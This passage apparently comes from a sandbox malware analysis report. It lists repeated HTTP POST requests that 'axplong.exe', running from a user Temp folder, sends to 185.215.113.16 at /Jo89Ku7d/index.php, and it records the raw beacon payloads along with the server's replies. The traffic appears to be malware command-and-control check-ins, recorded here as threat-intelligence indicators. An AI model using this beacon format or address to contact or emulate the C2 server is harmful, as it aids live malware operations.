Sep 26, 2024 22:42:08.221961021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:08.966223001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:08.969849110 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:09.207102060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	62675	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:09.680563927 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:10.383949041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:10.385018110 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:10.613161087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	62676	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:10.721990108 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:11.463812113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:11.466891050 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:11.695000887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	62677	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:11.815510035 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:12.548254013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:12.549175024 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:12.782916069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	62678	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:12.894133091 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:13.586543083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:13.587414026 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:13.810347080 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	62679	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:13.925261021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:14.615531921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:14.616544962 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:14.920463085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	62680	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:15.034363031 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:15.823436975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:15.824475050 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:16.050848007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	62681	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:16.204276085 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:16.955229044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:16.956394911 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:17.191816092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	62683	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:17.301146030 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:18.066307068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:18.067373037 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:18.296109915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	62685	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:18.409636021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:19.108939886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:19.109823942 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:19.337654114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	62686	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:19.456376076 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:20.152440071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:20.155742884 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:20.379661083 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	62687	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:20.488101959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:21.410228014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:21.410731077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:21.410934925 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:21.638104916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	62688	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:21.753366947 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:22.457644939 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
